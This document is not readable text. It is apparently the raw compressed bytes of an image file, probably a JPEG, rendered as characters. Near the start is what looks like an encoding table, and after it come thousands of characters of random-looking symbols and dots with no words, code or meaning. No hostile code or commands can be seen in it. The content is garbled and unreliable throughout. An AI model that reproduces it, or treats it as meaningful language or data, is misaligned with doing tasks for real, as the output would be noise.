.$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(......^..~?........&.._.../.xO.~...../.'F....O....W..A.....'._.kJ.$.#.wJ:K[......c.._\G!^....u.r..Z...~.G...3.........i._.5...o4....L...5...H..}K......x........MC.W.d..k.-........!..9.......p.....,....G..,......k..x...[7..)`(..QS.
..~.....p.
..q...V..x........,.....`......V.6.Q..e.^3    ...LE......u'..)..Q_..~._.t..+O.?..=../.|$...o.,...5.......k...~8...V_..Jt?.i..g........x..-n.].J..........B.S.o..!...+...I..>!.-....m.s......7...x.T.../...S..%../.!.'....t..k.v...[R..W.R..}...{.8..2..).qx.+.NR..F[..........#.W..t3.]..c.....X..n_...#....s`|&.....e.v..'V.(S.g.&*8.<....f.\f.0.......t...-.cO...pyw...:T..\...4O.S[...x...g.Ci.C.~&.'..z.&..........    ...U.<5..<C....|V.].....x...t{......xkW...e..K.&........MC..|C.x...|'.c.4|>.4^...C7.>3.............[._..G...k._iv.......GN...t...h^?...|3.M..nKK...#.JU.T.'.....JX<.w..:8.N.<].r.3.Z.*..Xl.4...........1.[.....e..-:s..s..).cp...e.>......<~...cs|
...p.e.a.....l.*...kE|%.~.^$.-.o.i_.S.....>(i...m.{S..Zg.MS..x.N.].o..;.V.....~*.G..y.C.x.[....Rit..].k...v...................,.......ho..........Zf..m_......K.|4....u...Io|..o.j.'..o.x...pZ.i..;..........#.y..J0..........W.....R.fp...<..S3...g.++.:...r.*..-....H...a..'E*..EB......QS...'C?.\~.T....{J5.....*..z.^W...=...:...t........O.x....|..[_j......^?.;Mi...h)s....GL..S.4...<;.....k...../......Q...x.._.<i..........|.....J.}..Y..>
..V.i.T...t.......OY.....xi4.k.....jzm.-.X....O..?..X.S....*..a1.*W...a..?....q.U...a....yU.T.9(Rj.gO.'.n(.....9u<V[...W[.....6.........*`...4eW1..._B.u+.......:+..o./.v....z.....|x.>;.o.|...|..J.......|U..@..m./..k...5...^..N.....o%.a..>.....z......+O....~1.m...@~.......?....'..$.y..t..i^9......./....W.....x?..-.t.S.^*.Q......)a"]E....../.....>Q...0.*..L........O...yW..X.....
.S.    `..}...],N.......q^..>.-..\..]..d.n.6.*g9U|^?..fy>U...8<./...pUq...K4.M.<.q.....4....+..K........>....o..    ......n.{.......A..._.4;*...".u?.~....m..............k?..../.5.k.).O.x~...._..@.4..6.    .k............7........5..<G...z...k...V...M..o...)<..x:..Z=...    ..l../......`..,E\&gG....ex...69.......n.,......)T.i....Z.}:..t...^t.|.5*43,..c....f.\.....a.tcV..l.7..d8xS.W....<.....7....3
.......k...W.$................h.Z?._....i..4?.kZN.u.x.V...|J..]]7.4.+.6....Z..gmoe7..g.^......Z....U...D.m./.~.. ..<.-...]...?.W..Z....K_.X....p.3..<?m......[j-....k....\a..u.3.:T)bkT.....e....sW.V..0..U..p.q.:X....3.I..J...o....C.....|.a.I.."..J5.B.7.ij)..sPx5)..<T....e....../.K...W.........g.'.h?hO.E.O.:...h>...D..,..!.:.W.E....l>...w../.ad........kV.O.?..h}?.>...3.sXi_.g[o..W...S...F..\x6?..wT.[LAq/.`..a7....P...C......tn.'.e....G.V.!V...^....J..n...a..q..w:u..*tc....1.A...|?.......aU:q.:..gy.e
1.JU[.,.2.....*xeQ.X.De.......GQ_.xo..........>..:..._....8K..    7./.D.......-..._x....|M..+.G....WIo.x.]........w~..[....$....................K..q..H.<1y.j.-..........-.-W..=.....]..~..x.......|-w}.iz..uw..y!...H)..ZJP...e.....(.2......,U\:.s8....\M:.:.GE..J.N....h..U.U...^.G8.kU..Us
.|>...0.[...F[...W.S........W.....!E|i{.G|_...(..U..........5{Me.7C....xo...Z|. .?h..?....v/...v.'..L./.|O...h:...O..x.M....s.....3....>....'........i.<A.....+.....*..Z.>2.o.:.............!.._....[...7Wzw...v....'.2,-G..|T...U...v`....2......WIU...q.........:..,>".*.|....JX|&Z.Q.0.v+4y.G[,.O1...t1X.N.0..e..c.....P.B....,DeE~.Q_.....3..\.s...C........M.O.xSY..a....n......n./x.U.....R.....+..7..oml.......5.........k...u....gI.m..W...>1......^$.yq...G....A.wI.K........2.k...|A.xV.x...6.&...5.....{..{o.z.....j..U..P...8,v!bp..NS.._    ,>..1..|.'...Ug..aB..P...|....U:.~..T..x.*..K.t(...f5.c)..
..8|5..8.[...G...n+.O.S..S..5.....;..?...].xV.........o.h.g...~.5.....<E...W.<1....xJ..>...|=5...^.W.....M..m4-..+...hcp.<v.......\~.....a1.zx.-e    .5"...S..R1.T..c$..W3...>e.e9....2.n+/.PUh.Tq.*..bi*.z....:...V.Z.j%.J...&QE....QE..QE.x.........a.]x...Z....._.|A. hp...G.....]*.M:..$V....4o.[\O..O.C... ..X...<M.3x_..    ..|..sX....i.[V..=....N.........g...~{..Z5...x/N.-no.n4..f{..ti.n.-'.............{.?    .1...M.(|..;....Uk.]i>.....A.~.$z\.6..._..(..5.w._.o.iph...cy...hl.N....{7...^>..../...............?.|;.jw....'.<mo}......3...y.h>..y.n|1.....F. ..S.<;.iZ...Z...Q.<.....-...8:...%...Q.x.g.....    ....-......qYVe......./..y..x.N....#....'.S....as    b2.....Nl7%.e.+.....|.8..c(.2..*..<$...c.....O.M........:.......s.O.|&......i...........j_.<wu....KM.gP..>....4;}.../...5.[Q.$.../x............<[.........U...7.7....."^2.W.I..F......./.ZE.x.U...Im....A..H.&....~......k..^..}._....x3....|l..
to    x...^....w...(..~.._..K...5....i.{.......(#..`.u=..P...i^..7......x.....o...>.x.U.-.....'./...\..zf.e.:.Q..KO.xKQ.,....%....u=N.....'..V..C..sc..........x.5.7*...*.18...Q..c...I.UJ.U.Le<..J....    ...U._...!C+.............`..../........1..."...!....J.a.\W
.."Y.#.......Q...<e.....~.^.N.m...g..z..zW..!x.G.s}.Yt..|4.>.....?
>'_..7.u...................C.....K.&.m........[...N...>|`m.......4...K.umm..S....n...'.u.W..5H..|+g....x..S...:.......?..O.>...O...go..=...    _.?.u[]#.Ki_..6..\...-j.......CF..}WY........KB..m..mi}.xz.W..W........kh|..+....q..g...<}.=7.7..7.........4...4.........5=........h..H5.gD..V..U..x?.....Rt..l..Uc....4...Ng.J....{/..o...5g*O(...o.....:4...|S..%...=u..........*.....|'.....a.J....ax/....X..|VG...S    .a.cx....Z.....5...........T..a../......._..u.|Y_.......}/..t......,....'......xk^....XkM.N.O.v...|9.~../...;...i/.\7..3.-j..G.~,i...x..D.E...4..]A..Q.|#mb.\.....;.......~8......o.........|q..7........W..x..]/C...j.....<}...Z..hr......;..s..].4.{....>..g.<..Yx+.].....).<.......x>..g...iV....'. ...?..........~&.W._.x3.gBy.5.MZ.[....1.c..e..S.M..`....<.........h...e..
X...K/..P..........:t.{f..Vt...W.....{...Q.#G.....fu.:..8zX|..r|.6..W.W..Ue.fX.k..v8..S.@|.../..._...|?.?.|.....<.q.o.]|L.......O..x...^4.{}.]i../uO...o.4]O..!....g.%......_.^...gE.'.>+7.|Ao.Ex....6....=.....+....C.............:V.,...u[....;..nuM:o..\.....o.x..~...o..M......>.!.o.z...-7........D{...'....T.../.......7.u/.O.....x.I.].....k.g.g._..3....q.j.....|A.-..H._    j....e......>..?.....> .9.[..Et[.....}.x...G.jW.....].....nf..-o.c.*..._3.    ..G...YXw?.a\.P...q......d..^.,..q|5)x..dx........+.Q.*.>.u.....QG..<.te....C.+..i.'..<.e.,.?..b0........G...Q.<9..M..<w.Ih~2...]x...7.....,..'.<o.....k.M....?....G.<+....i. ...M{..{....W..........!...o...uO.>&.H...............}/E.Z....x[@.~...~~.sx4..]B{.D^j.._.O.....y..x#.o..<_....6.. ../.~#........^&.F..x_\...+W.o.A...F..<Ya.......b.....|T.........x.L_..E..?.............zo.O..7.4.cP..|+...._.z].....Q......./..J..7.<Y.[k>....e.....xL-,n.......}j.k<%~|..h.    K.^.....7.....F..f..>..;......V9......^#...YVc..beN...g.|.+..L|0..4p..,.]S1.q.g.p.,g.)d..mC(...x......W..+..u.W......_..Ms.o..o].L.=.w.|g....7.|O.k......G...Ak....Y.F...=.G..wZ.:E.....}q...Z......c..o.[M....    |...>".'..j.H....f...|    ...|.....l|{.K.g..,......7.6..x..t.W../z.1..K......O..A.<..j:...|A.5...</..[.>).<'...^.O........4i/SX.....]Y.Cmk.M.Zk.F...........d[......x......i_xc....."6.7..._.1....$..Z.Y]+@.m...z.[kv....\.4K;.6/.X.|.....y,s\j...eR.......Ny)R....K.9Ta..|.]..}C..`......a14.,...z~.GO.|.6|=.yZ.'..<+.e....'C...0.../..t..+.3J.%.....y..,n3"...b*....W.....+..../._.......4?.~..............7.[..{.i...m..v..=C.d...%.h...5...7.i...|V..O.._..V>7>.....8i...........i&...x....u...O.i.,.,m...A.....o.jo..L._...M..._.'.i6.!...    ....B.4"...0....-Z.Y...3.....?..?....F...5.o.....    .;.i.<Ku....Q..B..........~%......V...?...    u...9......L.7....".E.4..~2.f......x./...>....c?.&..].j.n....8..m?.|%J..p......
x.J.&.l./.......ll.<].aa.Pk.5.......|&"\....|fC..j....\....b).uq.g..p..,..t..yb......Z..LE*.
.q8?.b._?.Q.z_..g.|Is...H..........C...f..../.V.*.Pf.4.5.    5./n~!.K..'..(.#a.z..{-...|N..."x.W...
~9..#.> |.....i..l~4.o.t......gY.u.I.w....R\.......k.
.....i..xsX.n..Z......>5i..a....o.~.x......|s..............o.i.5..<U..k.V...I...W..+.,.............?h_........i.:.......g]7N.9.|M..W.I.SkO...&......xk..+...U.m,<-.._.w._kW.i?..-".R3.y.xNym
..ukax..Z...5.........8......e1.9a..*.........q8wNX.F.x.i..[=..`+a.c2l..7..nG....,..K...1/...s..Q...^yv'....y.Y.
.X.v/...?....4.......z#...m.q.8x2./........B...h....k....M.|@.T.K.m....9.).b.......E.....?.......C.Y....E|2u.?...W.._.|>...Y.E..&:f...b.....5.\_.g..lu.;W...=......F...".....x....."xk.....>.h.^....7..%..Y.R.....<+..;..3.....Z...j......6.ms...t.=s......?.x....^    ..e...g.5_.|,........[.#..N..j/.xn.|ms.>.-N..x.|7._.|5...<V......j.....|A.:.#..."r...biT.4.L%H.(.9..:.........N3
..xY.8.0x.o...(P...E|....V.......E/.<U._..,=,5kT..gG...,N
...Y.U.gX.4qyz.kO../...C..x/.."......_..4....W.W..[[....._..7.<-...i.kO.<=..........G.j..c.3^x......6.....?....<.....6i~#....\^...0......#.7z..-C.}........!...h..K.?..cXo.6..mh^.....o.7.?....._|.........B.g.^)......Z.xF..zF...X.C.-v.4OW......A.O....f........>N.N.....CI.|!.....on|..?..$.|-.....&.O.....S.....K.R.G....-+]....:....|%.+..N.w....H...c.O.J...N..G..1..V.T*........g.f...G.V..a...x.vaR*.j.F2.a..B..7Tq.1.X...,=....B.)..+...-.c..%y|jT..}W+.......+.:x..U.P....T...'....    ..
..............>!....._x...2.....8._.n.u.]/.o.u..S..me....gN...i.-....ZO. ...D...~..G......V.1..Q.O.|[.u.K.V0>......<u....D....6w6.......2.[-
.E..G./[M...t.h...^.....x.U._..K....c.........t.7.    ...?.5.oN..^.....]+.F.t....z......x/.......gW6...t..../.S_..>..o.....x;.P....|Oo.K..:_.$.N..x[..'..42&..~2...{m.Ee.h.......K......]h....IpV.K...
K...U.9.s:.0.e..........R....K.....p...fx.`....c0xlE..D.X.h}J.
..fN..{,.EK......m...V/......T..x.>.!.....Q....X
.lv...?.     ..........$..._......g6.|C._...Y...5.....6.uo.k....:........T...._.......,...~)|0....5.X.!Xx6.H.F...5.=..~    ......K.a..2......A......... ...McA..}.../....    G.    S.P...a.N5.R.,4V.4*S....V...j..%^.HJ.h..f..|A..,.4..N5s.f2.c...L%hbqY...jb.W.)....}ib...I..
.....B.(...
(..
.S(.C.G$.70.,..RJ...I.).(...".3F...!...R.r....i.8..E.e(..Qn;.h.7Z.....M..i..gn..;=..}.z........N.C.........M~..7..|a.x......|.........
<:....K......_..!.....g..T...:f..j.-...i+..~..............xW......................Y...~6..../w......~(..<Q..k].|g.[...6........s....%..1.n...N..t0..../.a)J...a..0.O.......f43Lv.4..H.8.X....l.U.Z.k.e.lN+..T1u..U<u
.......qX\>E.._.e.v[..~.._.....Tr.6....],F.......3.../.>.H-~G...|@.w..._.....
~......|*...).A.}............F...-...>1xn......._
x....*.Y.~.~...4-_D.....K......G._.o..#./.o.|@.>&......._..%.....A....T.l........K.....&.uii.}....\.....b.ckbjb...V.*T.,w..4.Vj.g_.C...D..b%W4.}^+....xwC...O..2zY.._O.G.,.8..TU`....U..J....}o..c*....K*.eV.u...g8.^?..3.M..?.><k..l..~..........{........k.....>..^.....?    .
~.k...U....Z..o....?......f.|G...j.5.....o./.....~)E...t......0.W...~!j.Z......Xi.../.|M........x..V."..q.Yh.;.<q.7....k....M..2.[.......V..<n.x.....kV.^4j..F...%z.iS.V........U......R.2x..G.<K...Y.*.U..2.......`.................zO.rz..B.2y.....]hb.P......k.jIo.x....Z5.._.F|}....x.........v..7A.p.ZN..."..^$....]:.F..[...`...K.oYmb..N..o.3.~../.....u......dk.%......C...{..<...C.....|A.5o.......+G./|O...xo......Y{g....t.
X.G.5^1.~....7..z...$.>.s.i........|H.q..z....f..?...z.^....N..o.i.......5...7.^.....k7.v3.O.x/.B.L]|....-...t..j..p.f.&.W.....+&x,....F...J.x..G....T.h...g3.G........P.G.......3U......
.',N;    .q..AR.....:.u,.#,.q8?.......#N...&...m.~....D.!.,.y.u.Z....V._...2.A]3U.Y.S...z....7.R...M2.\.Gg.|.....xk......5............^,.).x./?k=~..G.|K............~.]7Y.l............c..+.....[.sT......._..W..|..xF..#]....=?Q....&.....[..B..J....p..K.d.h.<....^...~.x..n....D......mlE..oG...C../.............u..u..i..z..k..n.{.>.i.g.d..Yo`.i.....'(..!....p.:...GG.N..).)..`.`.r..W..F....~....(q'..9V;.`#...................L.(...Ul...f...q.le.."..0...f.~[...x..^......e..kg...
|1...x`.....c.....|.....F.....h...u.[k.z...\..)m....>..........t.i..G.5.....    |..o....^......7P.{..._.t[..-..-/J...........g..5..^..m.+]#B.?..=o.N|......w......Q........._.......4......qi...Rx...X.`.W........Z..s...4-'e...........>..........f......w../...x....-2...:...Yj........E.Z..-..ZF.q"Fu..<?..U.W...K.....y.*S...._].i.e.jx....V.iQ.
.x|%*..P.
G..8.|.....KR.)`..r.S'.b.B.....8...)^.#..=.0..].tp...xia1.<.3._.....|..[.....R...~.....MZ.]!....E...5..H.p5mR+.D..&....g(..|:..|o.h..!....!.......%.O...M.U:?...?..e...............W....I....K.`.K.W.t.6.ZM5......5c.+V.K...xg..6.......J....-....x.X....W....N.u.....z^....k..i~}...4.#K.w..E.. x.F..U.j.6....x...7.....M..O.v.s.............={>....U..W..yt.sG.H..S..s0..c..*....G......a1Q.C....apY.%N..(W..hS......|D.W&"2k..|{..3.C.._.1y..V.W+u*.3.f3.2.^......x..Xz..Rq..1.2...u..j...~..)o.....[..........c........m......_P.i..%o]j2x..Z...|/.e...l~..Z......^..b..9ky.].._........+...W...>.....
.E...._..K.......7.k.m?O.?..../.k^;.~.].^%...?....|S..K.$.....i.aKi/e.....}7..w.mG.........6.................w.^..i.h...F7Q..    .m.%.......X......~..o..}..-.......<..".]............?X
....>/.....w.,.C....:G.t...j~9.C.|Is.._.]Xj.|.......eG.:X.....
.j..c.f.=,......p..n3....y^;............k.......|g.Nq*XLN
..K....gJ.Q....q..,E*....r..!.7;..r...pX.&'.......p.N..k./.o..
.^=..}...S.....y.{.\..xO...W.4...;.~...M;F...'.^....ou.}GB....<Gw....9..mV...G.A./..._..i/.>......m+......Du..|z...]k....>...kM.....G...w...x..N.......+,W.I}'...W.5.>.....~9.$.).............R.......w..V...o.;..O.z...j.x..k.....c.....#...Z~..w..?./.<Q..].{......    ..'.o...1<    >.}.....:~...Z.c...^...[.cF..[.-<X....i.........:.\...1..^_.bp...o+..T.....[&..|..#    ....Z..z..q.K6..b..Rr.be....._...gY....|V..G....1.E..d..GN...U..........Y.e
.8K/.T.C).QT../...?e.o.....<M..?_......6..<7a..t.BO.|d....GB.&K.<9.\....zg.4d.u...=.-.;..n.c/....g...Y~..~(._.......2..xOP.s...Q.W..{.^...}...~6........    .4......<I.M...W].....x..E...!.......S.x..iU.a...+P.../..x,..y...ju..78......jr.........._.n&...1x..,V;?p...T...\>%d..........0..NO...*...N.LG.......    ...PI...S.._..?{.O...G...-.}F.P.k4?...........{..Et.M^/....O.|C.\.Z..'.5..,...4M2....~0~._.~&|H..K/..xw...........5..~......7....x....<5...qi.;...!.<G...]...}94.../.<!.x...Yk...W..    ....F.qJ.q.F".6#..e...G....(..1.g..;
.........c.p....*.-..lu<..\..*..3....Q...k.X.D..5)..tX:.L\.9~?,u2.....k.(U...s.
7.|yq...?~..8.?.ux.....<w.s.?..X.....q.|E..........6V>6..../../......-?F.4.i>.Iq(.......>/xo.g.<+.o.x.'k...{.;W..]......i.:.....].[.[...j....k....\...O....hQ...g...jl.>......O.....
.h.%l.+Qt)W....].I..
X.Ed.w...."..Bs.#..'.*.9..<K.b.......*9..6.C.J.3..pr.':..c1......g..'..x<...._...B4.D..>.k.........    .{..A..x....~.x..>+.Y.v.].L...3....|/....0......OI.~.x........iZ=..M...].E{.v...0yn...\......^.*..N    F*4.E(.J.)..P...hP...F.-.gX.!.q..e5S...9V.u$..F...=Z.+b.UU.T.ln;...1.T.y./......(...<...(...(...(...(...(...~.V..j.oyx.m...Zi.w:..t.v.\.{>.9./.'..V.v..su;$.F..)...G......|S....sS........[.}.....uI~?.q....?....T_.R.j.*..4....n./.o...}..ek..-.........R...*bj..G    ..`jB........_...S~..RQ..k.U.%...Q.E.u'8.o.qe~..f.}...E<...X...V.o...IU.Q.+:t.....e9.....3.F..........7.7..?.?...t..j>8...| ...E.}'R..M"......{.....k.kwe.xSO..I.=j....i.&.w=..Gn..w.....|M........x'.....G._.1x+H..%.]./.x.......xg..%....>    ...o....q.x..7.._......-.>...m.kEp.......n..Z..c.Ip.\.)...e..Q.a#.4..8.m9.pu.Fq.9.:R....>.$.o9..j.......c..X.D.y....(cy.(...W........a.m....<E:3....o..\......_.<'........
...[..._.V...    |`.*....O..5..>-.S..ob.f.....f..O..C.e..    izm..sG...<Ei...|p....9k.....~,/..-O.....|?._.-W.G...Z~..M......#x.W.D........... .X..j.D...c.......w..t]6.......:.....8.....8.EZ..J.!......Zx.J./.G:.0...,..K5....
.<z....x.W    ..p.xs..eY~+x...a...xK...j.(.1...v[^.<}LNw..I...".3,.W..~Qx...../..t...._.~....<E.CX...?..O....4.>,.}y...,.R.....g.o......|?k...r..K...>.........|...7..|M.K.......|S}...._.|3......%.............v.._.?.<...]O.....+B.V...:...^..Z....#(udl.e*pH8a... ......j.........8....Bt ...`..ny5J..N..2....e....b.a..../gZ.q..?.1J/...*...U...^.%...+.r.(J..'-....
9~X.a...    ..J..a(bp......\Z.r..........S...    ._..?..H.>.x.G.&....?.l.K....|b....^...N.C.?
.^.........x.W......l..v..?.x...k......C.[.._.............?....V..%.~+.......S.>.h~!......\.i..x.+...C..4..x..\.....4_.<....|<...<...;.#...4..xsK7w..Xh.%..v.k&..]_j....[.._.W......on....g...\%_+...O4....(..O...c..QG......."T...eTs..:....;..Ua<........p..l./.E......fc.|..3Hc+b.up..c..E<&...,...y*.........538a..?..x".._..........xk........#/........w..-F._.7a.i....g.v....f..x[...P......N..].x3W..... I.*?.Y.n...../.#.j~.......;......yh.$...+[..7.|..#Y.....ac.o..[....._.> ...<a...|U.}.Ez..S...Z.qRX\.]..p.!K.b...`0.n....aV....CR....i.....*....L=_#5....Q.e.....f.......J.^..L.9..d.V..".K..=,7...`s:x<g...........(...S...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(....w..m..O....n_.|2..........[.../..T.q'....g...j....y.x...o......$..........4.
.9..o....Yiz...{'..>7........2.....?.....:?.=.......+k......._.......Z........3F...O
j.wZ....s.......5.^?........oG.......&.]....F^.O....S...jr.J...h.R..}.^..(..1....15.....2..4>.W..PS..*....(Ju(..Yb...b..uE~#xK.
....Z......I..^\.S.W....Z...g.......z..8....P....._......>)../..wo.O.......=.O........a6......kM_R..|s..G....O.:......?.|...t_.O.|C.g..^=e...&......t.    x.=2;M_R.}.G.._.3.........SA.N..>.S.U..)UmA...l.1..9........Rq..?.R....P5.K0....O..Nu!&.N.:...XT.Z..(....".7)*.e..0l....j...M.G._...............7..t(WH...^......Y.k.z....*..E.5O..m,.V.Mu..;.#Y..T...?....S......T..<..I|O...O...W....i.........k..Q..\F...=.....O..yo.#..........WL.-...A.%8}f..rT..H.....M9.Uj.T.J........&..p...9."..C...G.._^P.....(..b*.R.P.    .1.Rx.NW...........)..j.TW.G......7.....xW.4.m?./    .M.'.u.x....;.g..x..?...h{..X...........[T.......=..'L......7.4....u..    t..>.~........^..........'..7.....1=..........~.../.......e.]2}[....    ..?.g....E.........7.k7..+bhA...a0..Ly.......    ^rmG..R.h......l<......3..S.VN..8.V
.......+...I.V.d.......J.x......*.jo...7........|U............mS..-...!ZI....|9.t...........2...s.l.u.W..;...]..<O..o.6~7}..._.>.x..w.5...>>.w...|R...>#......~#...~..>6j6....>...6.............|'.....A.gZ...m}........~:..)G......O...r..Z..p.P..z|..9.Bq.:...u)J.:^........p..9O    .Q.+....V...{&.w?g*ucO.sV.Z.l?..R3.4W...N.P?j.....u.O.>..wu........O....=I...'|......_.~|>...............wP|i.>..2O..GB..9u.c.G..<..a......F....|<.%.....b.......>)|B..~..~....~,| .k..>.x....7.......-~.E.i.......,....O...A-..~$.:.J.....y1..Z50.Z.R.(`.c...)...B.p....Z..*.~2.hS.(.NI.hC.O1.........z..J....F...Z.*U...7N........R.+^?.tW......g.7.-c....|....M...g.~;......y."..$..>1...3?._..........M....u.{.........qi.Z...z....4/..g.K...W.._~.......-|L....Q..|3....../....4..H<K.~.._..'.h..>;kz~...jz....a.W.7......,^....k...Z.a...a..#5.%..}x.....y.q.dTp......K2....".&..t..uW=%RT..S..E,#^..V.6..JQ....[.f....j..........F.ZsU.....J..-........M.'..~#.}....fo..%.Q..o...x.L...o.x........3...l5...1..~.\xO.....}'@......!\....O.|..skS..}_.o...........w.PZ......f.W.~..!.....sw..._.w.<..u....-...x....~..uD.../...D.l5}%o.n.....u..t......S...Xw....O..)}_.O.R...#..hP.....<]Z.p...C.[.U(........G.IBN8..^x..u..v..t.....5..)..#c......"|...0_Ac...9......V.......=xw.r|[.d...7_.....z...O.._
.<;a}.xg.._...:.:.{../.....>7|...].:|w.....K.Y.g.......o..e}._.....~.....x.W..><.....-..:..4......K.....B..g.F..xZ...a5[......\......C.b"..K..>..hR.%.ic..p...U..T.c.....2.HN.X.xy...L?.2<...N\....x.+...FX..x..G..F.I.....?.Q..2|).....S..n......._.k_.t..?.u..7...O....h...9...>%....-w...6>=.....%..".<M...^=...x.....?.\&M.k.......'X..f.O.0k.....M~.M{./.........a..>,..._.uO.>...>..'..sy{.oU.-.&.u..A..5C...9..\.m..Y..q.i,L0...T.
.kU.X.t..h........|F*...P.....w...iC...C..{ai(a14....~.Fx..q{...E~>....~5|h........./.^    ....K..|.....K..&...7.?.CW.....7.....6.F..........<a...x.S....}../.......5........_.>/x..$...G.|;.\....~...<.%.....|J_.........3c..3..k...4-WJ..Cu....8x.L....C....H...}...e.V"y.
0I.uq.~_..^..0...l^2.....N.*..c..?....r..Xb0U.....E`.OjrXln7    ..1...(a....i.}.HW....(.T..~.._..._.C...xo.'.....n......|_..G.w.?.C.O..;.._....x...l..?.l.1.L[.9.........}o.=.G.E..<s....:...i.7.+..a.K..Z.....w.7......O.s.../h/..4.?d..G.v...t.............M'...C.._.x.F....5Y.    ...|V..x.N..t..:xX....<40.....9....<;..&..k.#....l..U>.N.yG.Sl..6".ha.*.'.....9b.U....h......b.:x.m...x.<g.z...=../........W....t.O..K..-...RD......g.Agv.Co*\..x.N..."......^..1.*.k... ...V.B.6..:.g*u .\..g.E..........,V..+.?iC.F.z59e.zU.....5......e..^.I...QX...Q@..Q@.......z.~0.\.O.u..!.Qx[..j......s..,.=>......._.hP.kZ..ZF./t...mN.-.7.I/.._./...|P....c.b..uo..-....U.{R.-........44..xw..?....+.t!..Z^.4.GV...N.a.........P.......H).&.V..`..Q...R).qn2Mh.X.=a+sA..r..Y^;;U.F....*s^."..~.....e/....?.|..1..~......v.0...._.|..o.x..>-.......>1.v...O.x..v.)..Km..Z..........Qcrv.e.6~...tO.xk...?..;.....Y......e....'.>.x.N...O.....oB.....,n/.........Z.yw,....3.U.E(B.8.Jxy.....aB.7JT.F*..8J..BPQ.].N-:p./~.j....#8W./z.hTU.HV...Fj.U8..IT......k.?.X..V..Z....P.W.....u...U......j~%.[ .u.....F.5.....t}+M.$...m`......?J...:_...:l?....|<.I..............h..........#.......E..3...h....i.u...zm.0....b.(4.%N..A..*ThV.Q.(....bq.zpk..+......eJR..8.Q.'R.&.R.J..R..%.gVt.N..R.....p._..U...k.8..|....o..c.~...J.............o.....<-...9..+../.....|a....[\.O..O.|U...........<...i...<
.>.+.........O......<w..9..h..)...G.~.....~..R..".............~:..z_......>..e.'.......C.[./.>..w._...u.c.1...\_....k....>0'....7....~5....t..ic._...h]C.?..9._........>...W./..........8...k...._.~"...K..x.G.......c....~.....~.m....|8.o...|$.{...)~5x.I.q...mkY.....Ue...+}..~../.4..../......C.....f.<N*U.W....d.,:..O..R....."5...6'.*X.1.qU0.hB...g..(EF8|=.5..0......*.v..N."......x.-jY.jyO.V?...`..^6...x.......i[-j_....-........|?...K.Y5_..9.|Y............0.w....|3..CA...K............?._....../.....~%.?..,.W....K.......a....~.k.3}k...i...
.,.a.......~.....~(.u.'T...N;........$_./.8uK..c......?M>.{.><....oKx<cy#C{'.k../..4.../...._..L....#.....<y.{.....o....|......im+.>..x.....w.?.|c.$.../..s......[.........o........    .F.T...}.....O.........[.S=..'.N..p...W.*o.aj...r..J.B.Q...18<6c......S.~i.+..ib...^..f..9.9).4+a..<._..G)<....C._.^q..F.......i.....O.'.....[...t.^..E.....O....<].]|.....>.t.S...|{.}.[..u........u.#W........%....e./.%.._..........R.S..]].g...h........^...5.~....a..[.7.~........
.$........<O......}......7.......f...?..].....o..P........o|m.?.|I.......6.....T|d...<Yi..;\...../....../<#e.x_X......r]..    e./.|#.....?...F.......".T...?h-OZ.O.;...z...A...x..O...5.p.Dz..-../@.G.O
...o..7.[.    x._.vu...x:.c(W...C..h..(...#...t......s'O.Bv....*.YC.^.wJ#z..4.    ..K.R.    .[.:...j..9{GG.^t..T*...O5..O.J.........C.V...Y|P...m.S.^8....>=|l.|c.;.J.?._.
.v...J..g...q...^6.....'...o.....~/x.^........4...C...>+..>:~.Z~.q........<E.........~..v.7.'...;...|;.7.t.J..........!../.Gu.i...u.<>...z.C.....N...Px.    .....U..O.../.u."....o./....o........|c.?.....^.....S.......k>.....q.xe<o...@.>.%..>=..|M....w......'....=.Yi....J.g..t...o..!.qc7.<Io...v..........j......A.u...6?..zS..S.p*>.,..(...y2...,.1x_.F...py^o.g.|m9?.c..]z.Y..G    ..UqrX.l.....c.u;<z....O.....G...y6Q_'R8\.aF.7..do...s......|2..o......x.......mO...~.|.......KA....?..o..>..K..-.4.?.<Uk/......O.Z...t+...u.,.......?.    ?....|x.....'...c. ji.......f..x..].~!jO.X.&...k....=O....'.......x.R.}.c...kx.+._.LO.x...._.......I.W.?.|E.v..K...m.......x...L...}.S._.......G..6.DM...g.O..s.>....a...i..T....    .[C....e...[..]wR...........lt+;O.?.../.6.?.>(.......R..R.J.m~.x+.....?.k:/.m".A.-g,;.[......*...~aQ{lVOUN......>\....!O.....8V....B.'.J..,&w,5%^..!.p..ha.ZR....w*.......kT.U...:uk...<=9....K.....5..[...b/...4..x?...>'..#....~.Z...V..^.....m.!h^'..........f.h.....    ........?./d...._}S.?....g...o._.e........|9.4.....|9....x.K.|Q.o.v.^..].R.5_....u+..|<..J_.M.).4{.....,.Y....;.u}'..
.h..x{.......E......._...............-.........?....u..[.....uk]wC...<s.xj.[_...f..C.m7.>.|w......_...x........}...._.......z........#..Q.C.]..[...o..t}4..h:....h.../&&X.`.x.....>W(...JSy.%........G    ..2l.2.S.J..".
...F...M.E....jx|V:/5IN1..X..1...le|.5..u......1.k..8Q..`.c...?d..~!....    ~..<3.S.|.........~.|.........<    .x.....{....{...~).w..6..J..).+-4.cR....i....4K.J.?d..[......._...}....S....~'.f..g....O..;../.. .c.z..o.7q.j.....|A.x.A...;./H.~....O...u+..................G-.k-.....`.iq\j.    .!..I.M..5.-.Z..4.....o..:u.....g..../...Z..A.>.._0..X....l
.V.
uT..P..X...N.cW..:..b.....P...G.N......T..=....f......%..V..j.:..(........XU.O.....W..N........?..xf..............i>..'.O.xF.    iV.:..c.xf/...|z..g.x..:u.......:..i.io._G>...2....<K.......4.x..^...<s.?.x.......i?.....i.|6...b.:Y..k.kW........iW.Zn..=+...Es9JU]y7*.U^.m.w....JWq.Q'    UV....K..W.
.(ARTc...gJ....MN........k.V.$.8.8BQ.._..?d.......<S.....%....Y..........?....<    .S....O].o.............kY.....j67.~...?.\O&.u{......./....g....-.E..W.....xo.v:..o<ae.M............u..xO...<...xn.L.t.....!...N.......Sd......V..ZS....z...S...Vv...sm.h.%VU...(*R.w.eIFQT.S..5..*...q..............K;H".....8-....b....."..bD.(.U.8.Q.U@..ESnM.M.Rm.M..n...m.[z.Dc..1.Tc....%..+(.+$.I$.....QHaE.P.E.P.E.P.E.P.E.P.E.P.E~L~....?i.ho...?g).l#c.|"...S...e.....%[`x....~...+..(......m..%...6.    ......e.I....Yk...g.{.
